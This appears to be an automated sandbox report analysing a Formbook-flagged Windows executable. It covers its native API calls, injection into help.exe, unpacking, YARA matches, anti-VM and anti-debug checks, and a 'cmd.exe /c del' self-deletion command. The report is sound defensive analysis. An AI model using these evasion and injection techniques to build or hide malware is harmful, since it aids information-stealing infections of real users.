Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code functions and the native APIs they call (prefix is process index_dump index_address):
2_2_004181D0 NtCreateFile
2_2_00418280 NtReadFile
2_2_00418300 NtClose
2_2_004183B0 NtAllocateVirtualMemory
2_2_004181CE NtCreateFile
2_2_0041827A NtReadFile
2_2_004183AB NtAllocateVirtualMemory
2_2_00B198F0 NtReadVirtualMemory, LdrInitializeThunk
2_2_00B19860 NtQuerySystemInformation, LdrInitializeThunk
2_2_00B19840 NtDelayExecution, LdrInitializeThunk
2_2_00B199A0 NtCreateSection, LdrInitializeThunk
2_2_00B19910 NtAdjustPrivilegesToken, LdrInitializeThunk
2_2_00B19A20 NtResumeThread, LdrInitializeThunk
2_2_00B19A00 NtProtectVirtualMemory, LdrInitializeThunk
2_2_00B19A50 NtCreateFile, LdrInitializeThunk
2_2_00B195D0 NtClose, LdrInitializeThunk
2_2_00B19540 NtReadFile, LdrInitializeThunk
2_2_00B196E0 NtFreeVirtualMemory, LdrInitializeThunk
2_2_00B19660 NtAllocateVirtualMemory, LdrInitializeThunk
2_2_00B197A0 NtUnmapViewOfSection, LdrInitializeThunk
2_2_00B19780 NtMapViewOfSection, LdrInitializeThunk
2_2_00B19FE0 NtCreateMutant, LdrInitializeThunk
2_2_00B19710 NtQueryInformationToken, LdrInitializeThunk
2_2_00B198A0 NtWriteVirtualMemory
2_2_00B19820 NtEnumerateKey
2_2_00B1B040 NtSuspendThread
2_2_00B199D0 NtCreateProcessEx
2_2_00B19950 NtQueueApcThread
2_2_00B19A80 NtOpenDirectoryObject
2_2_00B19A10 NtQuerySection
2_2_00B1A3B0 NtGetContextThread
2_2_00B19B00 NtSetValueKey
2_2_00B195F0 NtQueryInformationFile
2_2_00B1AD30 NtSetContextThread
2_2_00B19520 NtWaitForSingleObject
2_2_00B19560 NtWriteFile
2_2_00B196D0 NtCreateKey
2_2_00B19610 NtEnumerateValueKey
2_2_00B19670 NtQueryInformationProcess
2_2_00B19650 NtQueryValueKey
2_2_00B19730 NtQueryVirtualMemory
2_2_00B1A710 NtOpenProcessToken
2_2_00B19770 NtSetInformationFile
2_2_00B1A770 NtOpenThread
2_2_00B19760 NtOpenProcess
2_1_004181D0 NtCreateFile
2_1_00418280 NtReadFile
2_1_00418300 NtClose
2_1_004183B0 NtAllocateVirtualMemory
2_1_004181CE NtCreateFile
2_1_0041827A NtReadFile
2_1_004183AB NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\help.exe; Code functions and the native APIs they call:
11_2_00B79860 NtQuerySystemInformation, LdrInitializeThunk
11_2_00B79840 NtDelayExecution, LdrInitializeThunk
11_2_00B799A0 NtCreateSection, LdrInitializeThunk
11_2_00B795D0 NtClose, LdrInitializeThunk
11_2_00B79910 NtAdjustPrivilegesToken, LdrInitializeThunk
11_2_00B79540 NtReadFile, LdrInitializeThunk
11_2_00B796E0 NtFreeVirtualMemory, LdrInitializeThunk
11_2_00B796D0 NtCreateKey, LdrInitializeThunk
11_2_00B79660 NtAllocateVirtualMemory, LdrInitializeThunk
11_2_00B79A50 NtCreateFile, LdrInitializeThunk
11_2_00B79650 NtQueryValueKey, LdrInitializeThunk
11_2_00B79780 NtMapViewOfSection, LdrInitializeThunk
11_2_00B79FE0 NtCreateMutant, LdrInitializeThunk
11_2_00B79710 NtQueryInformationToken, LdrInitializeThunk
11_2_00B798A0 NtWriteVirtualMemory
11_2_00B798F0 NtReadVirtualMemory
11_2_00B79820 NtEnumerateKey
11_2_00B7B040 NtSuspendThread
11_2_00B795F0 NtQueryInformationFile
11_2_00B799D0 NtCreateProcessEx
11_2_00B7AD30 NtSetContextThread
11_2_00B79520 NtWaitForSingleObject
11_2_00B79560 NtWriteFile
11_2_00B79950 NtQueueApcThread
11_2_00B79A80 NtOpenDirectoryObject
11_2_00B79A20 NtResumeThread
11_2_00B79610 NtEnumerateValueKey
11_2_00B79A10 NtQuerySection
11_2_00B79A00 NtProtectVirtualMemory
11_2_00B79670 NtQueryInformationProcess
11_2_00B7A3B0 NtGetContextThread
11_2_00B797A0 NtUnmapViewOfSection
11_2_00B79730 NtQueryVirtualMemory
11_2_00B7A710 NtOpenProcessToken
11_2_00B79B00 NtSetValueKey
11_2_00B79770 NtSetInformationFile
11_2_00B7A770 NtOpenThread
11_2_00B79760 NtOpenProcess
11_2_004181D0 NtCreateFile
11_2_00418280 NtReadFile
11_2_00418300 NtClose
11_2_004183B0 NtAllocateVirtualMemory
11_2_004181CE NtCreateFile
11_2_0041827A NtReadFile
11_2_004183AB NtAllocateVirtualMemory
Note: every 0x00B19xxx/0x00B1Axxx/0x00B1Bxxx function in process 2 reappears in process 11 at exactly +0x60000 (0x00B79xxx/0x00B7Axxx/0x00B7Bxxx), and the 0x0041xxxx functions sit at identical addresses in both, so the two processes carry the same injected code at a different load base plus the same image at 0x400000. The set NtCreateProcessEx, NtUnmapViewOfSection, NtMapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtResumeThread is the full process-hollowing primitive set, and NtOpenThread, NtSuspendThread, NtQueueApcThread, NtResumeThread the APC-injection set; both are present in each process.
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code function: 0_2_0040323C EntryPoint, #17, SetErrorMode, OleInitialize, SHGetFileInfoA, GetCommandLineA, GetModuleHandleA, CharNextA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcmpiA, CreateDirectoryA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, ExitWindowsEx, ExitProcess
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code functions (process 0, dump 2): 0_2_00404853, 0_2_00406131, 0_2_73611A98
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code functions (process 2, dump 2): 2_2_00401030, 2_2_0041C0A9, 2_2_0041C1CD, 2_2_0041B992, 2_2_0041C2A7, 2_2_0041A302, 2_2_00408C6B, 2_2_00408C70, 2_2_0041B4B3, 2_2_00402D87, 2_2_00402D90, 2_2_0041BD9E, 2_2_00402FB0, 2_2_00B020A0, 2_2_00BA20A8, 2_2_00AEB090, 2_2_00B91002, 2_2_00AF4120, 2_2_00ADF900, 2_2_00B0EBB0, 2_2_00AE841F, 2_2_00B02581, 2_2_00AED5E0, 2_2_00AD0D20, 2_2_00BA1D55, 2_2_00BA2EF7, 2_2_00AF6E30
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code functions (process 2, dump 1): 2_1_00401030, 2_1_0041C0A9, 2_1_0041C1CD, 2_1_0041B992, 2_1_0041C2A7, 2_1_0041A302, 2_1_00408C6B, 2_1_00408C70, 2_1_0041B4B3
Source: C:\Windows\SysWOW64\help.exe; Code functions (process 11, dump 2): 11_2_00B620A0, 11_2_00B4B090, 11_2_00C020A8, 11_2_00B4841F, 11_2_00BF1002, 11_2_00C025DD, 11_2_00B62581, 11_2_00B4D5E0, 11_2_00B30D20, 11_2_00C01D55, 11_2_00B54120, 11_2_00B3F900, 11_2_00C02D07, 11_2_00C02EF7, 11_2_00C022AE, 11_2_00B56E30, 11_2_00B6EBB0, 11_2_00C01FF1, 11_2_00BFDBD2, 11_2_00C02B28, 11_2_0041A302, 11_2_00408C6B, 11_2_00408C70, 11_2_00402D87, 11_2_00402D90, 11_2_00402FB0
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code function: String function 00419F80 appears 34 times
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code function: String function 00ADB150 appears 35 times
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe; Code function: String function 0041A0B0 appears 38 times
Source: C:\Windows\SysWOW64\help.exe; Code function: String function 00B3B150 appears 35 times
Source: 5t2CmTUhKc.exe, 00000000.00000003.340429454.0000000009AFF000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs 5t2CmTUhKc.exe
Source: 5t2CmTUhKc.exe, 00000002.00000002.417241372.0000000000D5F000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs 5t2CmTUhKc.exe
Source: 5t2CmTUhKc.exe, 00000002.00000002.416438453.0000000000AA4000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenameHelp.Exej% vs 5t2CmTUhKc.exe
Source: 5t2CmTUhKc.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Both rules matched in each of the following sources:
Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
Source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
Source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@11/6
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_01
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile created: C:\Users\user\AppData\Local\Temp\nse5FE8.tmpJump to behavior
          Source: 5t2CmTUhKc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 5t2CmTUhKc.exeVirustotal: Detection: 28%
          Source: 5t2CmTUhKc.exeReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeFile read: C:\Users\user\Desktop\5t2CmTUhKc.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Users\user\Desktop\5t2CmTUhKc.exe 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe'
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5t2CmTUhKc.exe, 00000000.00000003.333908194.00000000099B0000.00000004.00000001.sdmp, 5t2CmTUhKc.exe, 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 5t2CmTUhKc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Unpacked PE file: 2.2.5t2CmTUhKc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 0_2_73612F60 push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_0041624A pushad ; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_0041B47C push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_0041B412 push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_0041B41B push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_0040B7D2 push ebx; retf
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B2D0D1 push ecx; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_1_0041624A pushad ; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_1_0041B3C5 push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_1_0041B47C push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_1_0041B412 push eax; ret
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_1_0041B41B push eax; ret
Source: C:\Windows\SysWOW64\help.exe - Code function: 11_2_00B8D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\help.exe - Code function: 11_2_0041624A pushad ; ret
Source: C:\Windows\SysWOW64\help.exe - Code function: 11_2_0041B3C5 push eax; ret
Source: C:\Windows\SysWOW64\help.exe - Code function: 11_2_0041B47C push eax; ret
Source: C:\Windows\SysWOW64\help.exe - Code function: 11_2_0041B412 push eax; ret
Source: C:\Windows\SysWOW64\help.exe - Code function: 11_2_0041B41B push eax; ret
Source: C:\Windows\SysWOW64\help.exe - Code function: 11_2_0040B7D2 push ebx; retf
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - File created: C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe - Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe - RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe - RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_004088C0 rdtsc
Source: C:\Windows\SysWOW64\help.exe TID: 6520 - Thread sleep time: -40000s >= -30000s
Source: C:\Windows\explorer.exe - Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe - Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe - Last function: Thread delayed
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 0_2_0040263E FindFirstFileA,
Source: explorer.exe, 00000005.00000000.363736926.0000000008430000.00000004.00000001.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.363476569.00000000083EB000.00000004.00000001.sdmp - Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmp - Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.363476569.00000000083EB000.00000004.00000001.sdmp - Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.357220611.00000000063F6000.00000004.00000001.sdmp - Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mict
Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmp - Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmp - Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmp - Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000005.00000000.362788327.00000000082E2000.00000004.00000001.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.363736926.0000000008430000.00000004.00000001.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000005.00000000.384559230.0000000005D50000.00000002.00000001.sdmp - Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe - Process queried: DebugPort
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00409B30 LdrLoadDll,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B190AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B92073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B569A6 mov eax, dword ptr fs:[00000030h]
